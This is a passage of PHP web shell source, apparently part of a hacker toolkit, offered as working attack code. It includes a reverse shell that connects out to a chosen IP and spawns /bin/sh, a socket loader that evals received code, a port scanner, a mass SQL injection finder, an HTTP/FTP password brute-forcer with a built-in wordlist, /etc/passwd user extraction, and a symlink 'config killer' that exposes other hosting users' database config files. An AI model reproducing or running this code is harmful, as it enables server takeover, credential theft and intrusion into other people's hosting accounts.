($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = '';while (strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}} if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']); if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']); if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork(); if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;} umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1); $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if(!is_resource($process)) exit(1); stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);} if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);} if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;} } elseif(isset($_GET['x']) && ($_GET['x'] == 'whois')) { ?>
6721 <form action="?y=<?php echo $pwd; ?>&x=whois" method="post">
6722 <?php @set_time_limit(0); @error_reporting(0); function sws_domain_info($site) { $getip = @file_get_contents("hxxp://networktools.nl/whois/$site"); flush(); $ip = @findit($getip,'<pre>','</pre>'); return $ip; flush(); } function sws_net_info($site) { $getip = @file_get_contents("hxxp://networktools.nl/asinfo/$site"); $ip = @findit($getip,'<pre>','</pre>'); return $ip; flush(); } function sws_site_ser($site) { $getip = @file_get_contents("hxxp://networktools.nl/reverseip/$site"); $ip = @findit($getip,'<pre>','</pre>'); return $ip; flush(); } function sws_sup_dom($site) { $getip = @file_get_contents("hxxp://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains"); $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">'); return $ip; flush(); } function sws_port_scan($ip) { $list_post = array('80','21','22','2082','25','53','110','443','143'); foreach ($list_post as $o_port) { $connect = @fsockopen($ip,$o_port,$errno,$errstr,5); if($connect) { echo " $ip : $o_port ??? <u style=\"color: #FF0000\">Open</u> <br /><br />"; flush(); } } } function findit($mytext,$starttag,$endtag) { $posLeft = @stripos($mytext,$starttag)+strlen($starttag); $posRight = @stripos($mytext,$endtag,$posLeft+1); return @substr($mytext,$posLeft,$posRight-$posLeft); flush(); } echo '<br><br><center>'; echo '
6723 <br />
6724 <div class="sc"><form method="post"><table class="tabnet">
6725 <tr><th colspan="5">Website Whois</th></tr>
6726 <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:#FF0000;background-color:#000000" class="inputz" value="site.com" />   <input class="inputzbut" type="submit" style="color:#FF0000;background-color:#000000" name="scan" value="Scan !" /></td></tr>
6727 </table></form></div>'; if(isset($_POST['scan'])) { $site = @htmlentities($_POST['site']); if (empty($site)){die('<br /><br /> Not add IP .. !');} $ip_port = @gethostbyname($site); echo "
6728 <br /><div class=\"sc2\">Scanning [ $site ip $ip_port ] ... </div>
6729 <div class=\"tit\"> <br /><br />|-------------- Port Server ------------------| <br /></div>
6730 <div class=\"ru\"> <br /><br /><pre>
6731 "; echo "".sws_port_scan($ip_port)." </pre></div> "; flush(); echo "<div class=\"tit\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
6732 <div class=\"ru\">
6733 <pre>".sws_domain_info($site)."</pre></div>"; flush(); echo "
6734 <div class=\"tit\"> <br /><br />|-------------- Network Info ------------------| <br /></div>
6735 <div class=\"ru\">
6736 <pre>".sws_net_info($site)."</pre> </div>"; flush(); echo "<div class=\"tit\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
6737 <div class=\"ru\">
6738 <pre>".sws_sup_dom($site)."</pre> </div>"; flush(); echo "<div class=\"tit\"> <br /><br />|-------------- Site Server ------------------| <br /></div>
6739 <div class=\"ru\">
6740 <pre>".sws_site_ser($site)."</pre> </div>
6741 <div class=\"tit\"> <br /><br />|-------------- END ------------------| <br /></div>"; flush(); } echo '</center>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'color')) { ?>
6742 <form action="?y=<?php echo $pwd; ?>&x=color" method="post">
6743 <center>
6744 <object border="0" classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" codebase="hxxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" height="500" id="obj1" width="500"> <param value="hxxp://www.2createawebsite.com/build/color.swf" name="movie"><param value="High" name="quality"><embed pluginspage="hxxp://www.macromedia.com/go/getflashplayer" quality="High" src="hxxp://www.2createawebsite.com/build/color.swf" name="obj1" type="application/x-shockwave-flash" height="500" width="500"> </object></center>
6745 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'telin')) { ?>
6746 <form action="?y=<?php echo $pwd; ?>&x=telin" method="post">
6747 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://speedtest.telin.co.id/" width="100%"></iframe>
6748 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'spoison')) { ?>
6749 <form action="?y=<?php echo $pwd; ?>&x=spoison" method="post">
6750 <body bgcolor=black><div align=center><font color=white size=3 face="comic sans ms">
6751<form method=post>
6752<font color=white font size=5>--==[[<input style="color:#000000" type=submit name=hosted value="reverse ip(websites on server)">||>>++++<<||
6753<input style="color:#000000" type=submit name=sql value="bing based sql injection finder">||>>++++<<||<input style="color:#000000" type=submit name=scan value="mass SQLI finder">]]==--</font><font size=4><p>
6754 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|||||<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<</font><p>
6755</form>
6756
6757 <?php error_reporting(0); function entre2v2($text,$marqueurDebutLien,$marqueurFinLien) { $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[1]); $ar=trim($ar1[0]); return $ar; } function getHost($Address) { $parseUrl = parse_url(trim($Address)); return trim($parseUrl[host] ? $parseUrl[host] : array_shift(explode('/', $parseUrl[path], 2))); } function sql($tu) { $ch = curl_init(); $url=str_replace("=","='",$tu)."<br>"; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); $content=$result['EXE'] = curl_exec($ch); if(preg_match("/You have an error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$content)) { echo "<div align=center><table width=90% border=1 ><tr><td align=center><font color=red size=4 face='comic sans ms'> i got sql injection symtoms in website <font color=white size=4 face='comic sans ms'> $tu </font> </font></td></tr></table>"; } else { echo "<br>bhai ji check link manually for vulnerability existance :( <br>"; } } function e($i,$q,$p) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'hxxp://www.bing.com/search?q=ip%3A' .$i . '+'.$q.'&go=&qs=n&first=' . $p.'0&FORM=PERE'); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_REFERER, 'hxxp://www.bing.com/'); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); return $result['EXE'] = curl_exec($ch); curl_close($ch); } ?>
6758
6759
6760<?php if(isset($_POST['scan'])) { ?>
6761 <form method=post><font color=white size=4 face="comic sans ms">
6762Target server ip/website: <br>||<br>\/<br><input style="color:#000000" type=text name=serverip value=127.0.0.0> <p>
6763<input style="color:#000000" type=submit name=billu value="extract domains for scanning"><p>
6764</form>
6765<?php } ?>
6766
6767<?php error_reporting(0); if(isset($_POST['billu'])) { $iw=$_POST['serverip']; $rr=ereg_replace("(hxxps?)://", "", $iw); $web= ereg_replace("www.", "", $rr); echo "<font color=#ff9933>server ip is ".gethostbyname($web)."</font>"; $server=gethostbyname($web); echo "</font><br>###############################################<br>"; echo "<font size=4 color=white>list of hosted website is given below...... </font><br>"; $var=0; $alllinks=array(); do { $pgs=$var; $link="hxxp://www.bing.com/search?q=ip%3A" .$server . "&go=&qs=n&first=" . $pgs."0&FORM=PERE"; $uurl=file_get_contents($link); if($uurl && preg_match('/\">Next<\/a><\/li>/i',$uurl)) { $r=1; $pdata=e($server,$qu,$pgs); if(preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $pdata,$i, PREG_SET_ORDER)) { foreach($i as $match) { $total=$match[0]."\n" ; $domain=entre2v2($total,"a href=\"","\" h=\"ID="); $URL=gethost($domain); $li=ereg_replace("www.", "", $URL); array_push($alllinks,$li); } } } else{ $r=0; } $var++; }while($r!='0'); $lastarray=array_unique($alllinks); echo "<form method=post>"; echo "<textarea rows=10 cols=50 name=a>"; foreach($lastarray as $sw){ echo $sw."\n"; } echo "</textarea>"; echo "<p><input style=\"color:#000000\" type=submit name=msqli value=\"start SQLI scanning\"></form>"; } ?>
6768
6769<?php if(isset($_POST['msqli'])) { $a=explode("\n",$_POST['a']); foreach($a as $sa) { echo $URL=trim($sa); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$URL ); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_REFERER, 'hxxp://www.google.com/'); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); $result['EXE'] = curl_exec($ch); $result['ERR'] = curl_error($ch); curl_close($ch); if ( empty( $result['ERR'] ) ) { if(preg_match_all('/<a\s+href=["\']([^"\']+)["\']/i', $result['EXE'],$i, PREG_SET_ORDER)) { foreach($i as $match) { $text1=$match[1] ."<br>"; echo $domain=getHost($URL)."/".$text1; if(preg_match("/=/i",$domain)) { sql($domain); } else { echo "<br><font color=white> link dont have dynamic parameter<br>"; } }}} } } ?>
6770
6771<?php if(isset($_POST['hosted'])) { ?>
6772 <form method=post>
6773<font size=4>website/ip</font> <br>||<br>\/<br> <input type=text name=ip >
6774<p><input type=submit name=s value="extract hosted websites"></form>
6775<?php } ?>
6776
6777
6778<?php set_time_limit(0); error_reporting(0); if(isset($_POST['s'])) { $iw=$_POST['ip']; $rr=ereg_replace("(hxxps?)://", "", $iw); $web= ereg_replace("www.", "", $rr); echo "<font color=#ff9933>server ip is ".gethostbyname($web)."</font>"; $server=gethostbyname($web); echo "</font><br>###############################################<br>"; echo "<font size=4 color=white>list of hosted website is given below...... </font><br>"; $var=0; do { $pgs=$var; $link="hxxp://www.bing.com/search?q=ip%3A" .$server . "&go=&qs=n&first=" . $pgs."0&FORM=PERE"; $uurl=file_get_contents($link); if($uurl && preg_match('/\">Next<\/a><\/li>/i',$uurl)) { $r=1; $pdata=e($server,$qu,$pgs); if(preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $pdata,$i, PREG_SET_ORDER)) { foreach($i as $match) { $total=$match[0]."\n" ; $domain=entre2v2($total,"a href=\"","\" h=\"ID="); $URL=gethost($domain); echo "<br><a href=hxxp://".$URL.">".$URL."</a>"; }} } else{ $r=0; } $var++; }while($r!='0'); } ?>
6779
6780
6781
6782<?php if(isset($_POST['sql'])) { ?>
6783
6784 <form method=post><font color=white size=4 face="comic sans ms">
6785Target server ip/website: <input style="color:#000000" type=text name=ip value=127.0.0.0>  
6786<font color=white size=4 face="comic sans ms"><p>
6787 query bhai ji =)) ==><input style="color:#000000" type=text name=query value=.php?><p>
6788<input style="color:#000000" type=submit name=ssm value="Chal billu XD">
6789</form>
6790<?php } ?>
6791
6792<?php error_reporting(0); set_time_limit(0); if(isset($_POST['ssm'])) { $wi=$_POST['ip']; $rr=ereg_replace("(hxxps?)://", "",$wi); $server= ereg_replace("www.", "", $rr); echo "<font size=4>server under scaning ==> ". $sr=gethostbyname($server); echo "   query ==> ".$qu=trim($_POST['query']); echo "</font><br>=====================================================================<br>"; $var=0; do { $pgs=$var; $link="hxxp://www.bing.com/search?q=ip%3A".$sr . "+".$qu."&go=&qs=n&first=" . $pgs."0&FORM=PERE"; $uurl=file_get_contents($link); if($uurl && preg_match('/\">Next<\/a><\/li>/i',$uurl)) { $r=1; $pdata=e($sr,$qu,$pgs); if(preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $pdata,$i, PREG_SET_ORDER)) { foreach($i as $match) { $total=$match[0]."\n" ; $domain=entre2v2($total,"a href=\"","\" h=\"ID="); echo "<br><font color=red size=4><b>testing link </b></font>".$domain; if(preg_match("/=/i",$domain)) { sql($domain); } else { echo "<br><font color=white> link dont have dynamic parameter<br>"; } } } } else{ $r=0; } $var++; }while($r!='0'); } ?>
6793 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'rd')) { ?>
6794 <form action="?y=<?php echo $pwd; ?>&x=rd" method="post">
6795 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://rubiq.co.za/administrator/rd.php" width="100%"></iframe>
6796 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'configkiller')) { ?>
6797 <form action="?y=<?php echo $pwd; ?>&x=configkiller" method="post">
6798 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://rubiq.co.za/administrator/configkil.php" width="100%"></iframe>
6799 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcr')) { ?>
6800 <form action="?y=<?php echo $pwd; ?>&x=whmcr" method="post">
6801<center><form method=post><font color=red size=3 face="comic sans ms">username extractor<br>
6802 <input style="font-size:normal;color:#000000" type=submit name=passx value="cat /etc/passwd"> <input style="font-size:normal;color:#000000" type=submit name=passb value="/etc/passwd bypasser">
6803 </form><p>
6804 <?php if(isset($_POST['passb'])) { ?>
6805<textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/group"); foreach($users as $user) { $str=explode(":",$user); echo $str[0]."\n"; } ?></textarea>
6806<?php } ?>
6807<form method=post>
6808 <font color=white size=2 face="comic sans ms">
6809 website/ip address:<input style="font-size:normal;color:#000000" type=text name=target value="localhost">
6810 Port:<input style="font-size:normal;color:#000000" type=text name=port value=2082>
6811 </form><p><table width=30%><td align=center>user list</td><td align=center>passwords</td></table>
6812 <?php if(isset($_POST['passx'])) { ?>
6813<textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd"); foreach($users as $user) { $str=explode(":",$user); echo $str[0]."\n"; } ?></textarea>
6814<?php } else{ ?>
6815 <textarea style="background:black;color:white" rows=20 cols=25 name=usernames ></textarea>
6816
6817<?php } ?> <textarea style="background:black;color:white" rows=20 cols=25 name=passwords><?php echo "brazil\admin1234567890\brasil123\brazil1234567890\br1234567890\f32ws4f\cyberroulette\nrootactive\nadministrator\npakistan\npak123\npak12345\npakistan786\npak786\n786\n786786\npak123456\npak1234\nallah786\nallahu\nallahisgreat\npakistani\npak4ever\nallah\nallah123\nallah1234\nallah12345\nallah123456\nallah911\npakbest\nadmin786\nadmin@786\nsql@786\nPakistan\nPak\nPakistan123\nPakistan1234\nPakistan786\nPak786";?></textarea><br><br>
6818name of the file in which you want to store cracked panel info==> <input style="font-size:normal;color:#000000" type=text name=crack value=crack.txt>
6819<p><input style="font-size:normal;color:#000000" type=submit name=cracking value="lets hex this shit XD" /></form></p><br>
6820<?php error_reporting(0); set_time_limit(0); $connect_timeout=5; function any($prtcl,$host,$user,$pass,$timeout,$cracked,$aport){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$prtcl://$host:$aport"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_hxxpAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 0 ){ echo "<table width=100% ><tr><td align=center><b><font color=white size=2>=======================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>=======================</font></b></td></tr></table>"; $x=$user." ".$pass ." \n" ; $y=@fopen($cracked,'a+'); @fwrite($y,$x); } curl_close($ch); } function Rsl($host) { if(strrpos($host, '/', -1) == strlen($host)-1) { return substr($host,0,strrpos($host, '/', -1)); } else{ return $host; } } $userl=$_POST['usernames']; $passl=$_POST['passwords']; $port=trim($_POST['port']); $crack=$_POST['crack']; if(isset($_POST['cracking'])) { $target = trim($_POST['target']); $tarhr=ereg_replace("(hxxps?)://", "", $target); $tarwr=ereg_replace("www.", "", $tarhr); $ftar=rsl($tarwr); $userlist=explode("\n",$userl); $passlist=explode("\n",$passl); if($port!=21) { $protocol="hxxp"; foreach ($userlist as $user) { echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>"; $finaluser = trim($user); foreach ($passlist as $password ) { $finalpass = trim($password); any($protocol,$target,$finaluser,$finalpass,$connect_timeout,$crack,$port); } } } else{ $protocol="ftp"; foreach ($userlist as $user) { echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>"; $finaluser = trim($user); foreach ($passlist as $password ) { $finalpass = trim($password); any($protocol,$target,$finaluser,$finalpass,$connect_timeout,$crack,$port); } } } } ?></center>
6821<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'ccv')) { ?>
6822 <form action="?y=<?php echo $pwd; ?>&x=ccv" method="post">
6823 <?php class CreditCardValidator { private $arrCardInfo = array( 'status' => null, 'type' => null, 'substring' => null, 'reason' => null ); private $arrCardTypes = array( 'amex' => array( 'name' => 'American Express', 'active' => true, 'iinrange' => '34,37', 'length' => 15 ), 'discover' => array( 'name' => 'Discover', 'active' => true, 'iinrange' => '6011,622126-622925,644-649,65', 'length' => 16 ), 'mastercard' => array( 'name' => 'MasterCard', 'active' => true, 'iinrange' => '51-55', 'length' => 16 ), 'visa' => array( 'name' => 'VISA', 'active' => true, 'iinrange' => '4', 'length' => 16 ) ); private $arrAcceptedMII = array(3, 4, 5, 6); public function Validate($strCardNumber=null, $strCardType=null) { if($strCardNumber === null) { $this->arrCardInfo['failure'] = 'format'; $this->arrCardInfo['status'] = 'invalid'; return false; } if(($strCardType !== null) && !in_array($strCardType, $this->arrCardTypes)) { $this->arrCardInfo['failure'] = 'cardtype'; $this->arrCardInfo['status'] = 'invalid'; return false; } if(!$this->CheckMII($strCardNumber)) { $this->arrCardInfo['failure'] = 'mii'; $this->arrCardInfo['status'] = 'invalid'; return false; } if(!$this->CheckIIN($strCardNumber)) { $this->arrCardInfo['failure'] = 'iin'; $this->arrCardInfo['status'] = 'invalid'; return false; } if(!$this->CheckLuhn($strCardNumber)) { $this->arrCardInfo['failure'] = 'algorithm'; $this->arrCardInfo['status'] = 'invalid'; return false; } $this->arrCardInfo['status'] = 'valid'; $this->arrCardInfo['substring'] = $this->GetCardSubstring($strCardNumber); return true; } private function CleanCardNumber($strCardNumber=null) { return preg_replace('/[^0-9]/', '', $strCardNumber); } private function GetCardSubstring($strCardNumber=null) { if(strstr($strCardNumber, '*') && (substr($strCardNumber) < 10)) return $strCardNumber; $strCardNumber = $this->CleanCardNumber($strCardNumber); return $strCardNumber ? '***'.substr($strCardNumber, (strlen($strCardNumber) - 4), 4) : ''; } private function CheckMII($strCardNumber=null) { $strCardNumber = $this->CleanCardNumber($strCardNumber); if(!$strCardNumber) return false; $intFirstDigit = (int) substr($strCardNumber, 0, 1); if(!in_array($intFirstDigit, $this->arrAcceptedMII)) return false; return true; } private function CheckLuhn($strCardNumber=null) { $strCardNumber = (string) $this->CleanCardNumber($strCardNumber); $strCheckDigit = substr($strCardNumber, (strlen($strCardNumber) - 1), 1); $strCardNumberReverse = strrev($strCardNumber); $intTotal = 0; for($i = 1; $i <= strlen($strCardNumberReverse); $i++) { $intVal = (int) ($i % 2) ? $strCardNumberReverse[$i-1] : ($strCardNumberReverse[$i-1] * 2); if($intVal > 9) { $strVal = (string) $intVal; $intVal = (int) ($strVal[0] + $strVal[1]); } $intTotal += $intVal; } return (($intTotal % 10) == 0) ? true : false; } private function CheckIIN($strCardNumber=null) { $strCardNumber = $this->CleanCardNumber($strCardNumber); if(!$strCardNumber) return false; $arrCardTypePossibilities = array(); foreach($this->arrCardTypes as $strShortName => $arrCardType) { if($arrCardType['active'] === true) { $strLen = strlen($strCardNumber); if($strLen == $arrCardType['length']) { $arrRangeSets = explode(',', $arrCardType['iinrange']); foreach($arrRangeSets as $strRangeSetItem) { $arrStrRanges = explode('-', $strRangeSetItem); if(count($arrStrRanges) > 1) { for($i = $arrStrRanges[0]; $i <= $arrStrRanges[1]; $i++) { if( (strpos((string) $strCardNumber, (string) $i) === 0) && !in_array($strShortName, $arrCardTypePossibilities) ) $arrCardTypePossibilities[] = $strShortName; } } else { if( (strpos((string) $strCardNumber, (string) trim($arrStrRanges[0])) === 0) && !in_array($strShortName, $arrCardTypePossibilities) ) $arrCardTypePossibilities[] = $strShortName; } } } } } $this->arrCardInfo['type'] = implode('|', $arrCardTypePossibilities); return count($arrCardTypePossibilities) ? true : false; } public function GetCardInfo() { return $this->arrCardInfo; } public function GetCardName($strCardShortName=null) { return isset($this->arrCardTypes[$strCardShortName]['name']) ? $this->arrCardTypes[$strCardShortName]['name'] : ''; } } $CCV = new CreditCardValidator(); if(isset($_POST['cardnum'])) : $CCV->Validate($_POST['cardnum']); $CARDINFO = $CCV->GetCardInfo(); endif; ?>
6824
6825<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "hxxp://www.w3.org/TR/html4/strict.dtd">
6826
6827<html lang="en">
6828
6829 <head>
6830
6831 <meta hxxp-equiv="Content-Type" content="text/html; charset=utf-8">
6832
6833 <title>Credit Card Validation - Test Page</title>
6834
6835 <style type="text/css">
6836 body{ font-size: 13px; color: #333; font-family: 'georgia', 'times new roman', serif; margin: 20px; }
6837 fieldset{ border: 0; margin: 0; font-style: italic; }
6838 legend{ display: none; }
6839 label{ width: 100%; float: left; clear: both; font-size: 15px; font-weight: bold; color: #999; line-height: 3; }
6840 input, textarea{ font-size: 18px; line-height: 1.4; padding: 10px; border: 2px solid #eee; }
6841 textarea{ background-color: #eee; color: blue; }
6842 h2{ font-size: 30px; }
6843 #fs-input input{ width: 500px; margin-bottom: 15px; }
6844 #fs-input input.cb{ width: auto; }
6845 #fs-submit input{ background-color: #333; color: lightyellow; }
6846 </style>
6847
6848 </head>
6849
6850 <body>
6851
6852 <h2>Credit Card Tester</h2>
6853
6854 <form action="" method="post">
6855
6856 <fieldset id="fs-input">
6857 <legend></legend>
6858 <label>Card Number</label>
6859 <input type="text" style="color:#FF0000;background-color:#000000" name="cardnum" value="<?php echo @$_POST['cardnum']; ?>"><br>
6860 <input type="checkbox" name="showgeek" class="cb" value="1"<?php if(isset($_POST['showgeek'])) echo ' checked'; ?>> Show Geeky Output
6861 </fieldset>
6862
6863 <fieldset id="fs-submit">
6864 <legend></legend>
6865 <label></label>
6866 <input type="submit" value="Check CC">
6867 </fieldset>
6868
6869 <?php if(isset($_POST['cardnum'])) : ?>
6870 <hr>
6871 <h2>Result</h2>
6872 <fieldset id="fs-result">
6873 <legend></legend>
6874 <label></label>
6875 <strong>Status:</strong> <?php echo strtoupper($CARDINFO['status']); ?><br>
6876 <strong>Card Type: </strong> <?php echo $CCV->GetCardName($CARDINFO['type']); ?>
6877 </fieldset>
6878 <?php endif; ?>
6879 <?php if(isset($_POST['showgeek'])) : ?>
6880 <fieldset id="fs-geek-result">
6881 <legend></legend>
6882 <label>Geeky Result</label>
6883 <textarea style="color:#FF0000;background-color:#000000" rows="40" cols="80"><?php print_r($CCV); ?></textarea>
6884 </fieldset>
6885 <?php endif; ?>
6886
6887
6888 </form>
6889
6890 </body>
6891
6892</html>
6893 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'apache')) { ?>
6894 <form action="?y=<?php echo $pwd; ?>&x=apache" method="post">
6895 <?php $head = '
6896<html>
6897<head>
6898</script>
6899<title>APACHE</title>
6900<meta hxxp-equiv="Content-Type" content="text/html; charset=UTF-8">
6901<script language=\'javascript\'>
6902function hide_div(id)
6903{
6904 document.getElementById(id).style.display = \'none\';
6905 document.cookie=id+\'=0;\';
6906}
6907function show_div(id)
6908{
6909 document.getElementById(id).style.display = \'block\';
6910 document.cookie=id+\'=1;\';
6911}
6912function change_divst(id)
6913{
6914if (document.getElementById(id).style.display == \'none\')
6915show_div(id);
6916else
6917hide_div(id);
6918}
6919</script>'; ?>
6920<html>
6921<head>
6922<?php echo $head; ?>
6923<body bgcolor=black><center><br/><br/> <img src="hxxp://silk.apana.org.au/graphics/apache_logo.gif">
6924<form method=post><br/><br/>
6925<nobr><b><span class='b7'>[ APACHE</span> <span class='b8'>TOOLS ]</span></b></nobr><br/><br/>
6926<p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
6927
6928<?php if(isset($_POST['usre'])){ ?>
6929<form method=post>
6930<textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd"); foreach($users as $user) { $str=explode(":",$user); echo $str[0]."\n"; } ?></textarea><br><br>
6931<input type=submit style=color:#FF0000;background-color:#000000 name=su value="EXECUTE" /></form><br/>
6932<?php } ?>
6933
6934<?php error_reporting(0); if(isset($_POST['su'])){ mkdir('dm',0777); $rr = "Options all \r
6935DirectoryIndex Sux.html \r
6936AddType text/plain .php \r
6937AddType text/plain .html \r
6938AddType text/plain .bak \r
6939AddType text/plain .old \r
6940AddHandler server-parsed .php \r
6941AddHandler txt .html \r
6942Require None \r Satisfy Any"; $g = fopen('dm/.htaccess','w'); fwrite($g,$rr); $dm = symlink("/","dm/dm.txt"); $rt="<a href=dm/dm.txt><b><span class='b11'>[ SYMLINK ]</span></b></a>"; echo "<nobr>[~] "; echo "$rt"; $dir=mkdir('DM',0777); $r = "Options all \r
6943DirectoryIndex Sux.html \r
6944AddType text/plain .php \r
6945AddType text/plain .html \r
6946AddType text/plain .bak \r
6947AddType text/plain .old \r
6948AddHandler server-parsed .php \r
6949AddHandler txt .html \r
6950Require None \r
6951Satisfy Any"; $f = fopen('DM/.htaccess','w'); fwrite($f,$r); $consym="<a href=DM/><b><span class='b11'>[ CONFIG KILLER ]</span></b> </a>"; echo " [~] "; echo "$consym"; echo " [~]</nobr>"; $usr=explode("\n",$_POST['user']); $configuration=array( "aksi.php", "aksi.php.old", "aksi.php.bak", "conf.php", "conf.php.old", "conf.php.bak", "conf_global.php", "conf_global.php.old", "conf_global.php.bak", "config.php", "config.php.old", "config.php.bak", "configuration.php", "configuration.php.old", "configuration.php.bak", "conn.php", "conn.php.old", "conn.php.bak", "connect.php", "connect.php.old", "connect.php.bak", "connection.php", "connection.php.old", "connection.php.bak", "db.php", "db.php.old", "db.php.bak", "database.php", "database.php.old", "database.php.bak", "inc.php", "inc.php.old", "inc.php.bak", "koneksi.php", "koneksi.php.old", "koneksi.php.bak", "mysql.php", "myqsl.php.old", "mysql.php.bak", "setting.php", "setting.php.old", "setting.php.bak", "Settings.php", "Settings.php.old", "Settings.php.bak", "sql.php", "sql.php.old", "sql.php.bak"); foreach($usr as $uss ){ $us=trim($uss); foreach($configuration as $c){ $rs="/home/".$us."/public_html/".$c; $r="DM/".$us."~".$c; symlink($rs,$r); } } } ?>
6952 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'hostgator')) { ?>
6953 <form action="?y=<?php echo $pwd; ?>&x=hostgator" method="post">
6954 <?php $head = '
6955<html>
6956<head><title>HOSTGATOR</title>
6957<meta hxxp-equiv="Content-Type" content="text/html; charset=UTF-8">
6958<script language=\'javascript\'>
6959function hide_div(id){
6960 document.getElementById(id).style.display = \'none\';
6961 document.cookie=id+\'=0;\';
6962}
6963
6964function show_div(id){
6965document.getElementById(id).style.display = \'block\';
6966document.cookie=id+\'=1;\';
6967}
6968
6969function change_divst(id){
6970if (document.getElementById(id).style.display == \'none\')
6971show_div(id);
6972else
6973hide_div(id);
6974}
6975</script>'; ?>
6976<html>
6977<head>
6978<?php echo $head; ?>
6979<body bgcolor=black><center><br/><br/><img src="hxxp://partnernoc.cpanel.net/logo/822-4021-logo.png">
